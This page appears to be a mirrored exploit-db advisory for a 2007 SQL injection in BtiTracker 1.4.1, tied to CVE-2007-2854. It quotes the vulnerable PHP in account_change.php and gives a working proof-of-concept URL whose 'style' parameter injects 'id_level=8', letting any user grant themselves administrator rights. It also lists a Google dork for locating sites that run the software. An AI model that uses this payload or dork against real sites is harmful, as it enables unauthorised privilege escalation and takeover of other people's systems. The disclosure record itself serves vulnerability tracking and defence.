Lucene search
M@ge|ozzEDB-ID:3970HistoryMay 22, 2007 - 12:00 a.m.
BtiTracker 1.4.1 - Become Admin SQL Injection
2007-05-2200:00:00
m@ge|ozz
www.exploit-db.com
16
AI Score
7.4
Confidence
Low
#################################################################################
#
# BtiTracker <=v1.4.1 Remote SQL Injection Exploit
#
# Discovered by: m@ge|ozz - [email protected]
# Vulnerabitity: Remote Sql Injection /
# Problem: Any user can be Administrator
# Website Vendor: http://www.btiteam.org
#
# Vulnerable Code (account_change.php):
#
# if (isset($_GET["style"]))
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);
#
# if (isset($_GET["langue"]))
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);
#
# PoC: account_change.php?style=2[SQL]&returnto=%2F
#
# Example to gain admin control: account_change.php?style=1,id_level=8
#
#
# GoogleDork: "by Btiteam"
#
# Shoutz: - eVolVe or Die -
#
#################################################################################
# milw0rm.com [2007-05-22]Related
prion
prion
Sql injection
2007-05-24 19:30:00
cve
cve
CVE-2007-2854
2007-05-24 19:30:00
nvd
nvd
CVE-2007-2854
2007-05-24 19:30:00
cvelist
cvelist
CVE-2007-2854
2007-05-24 19:00:00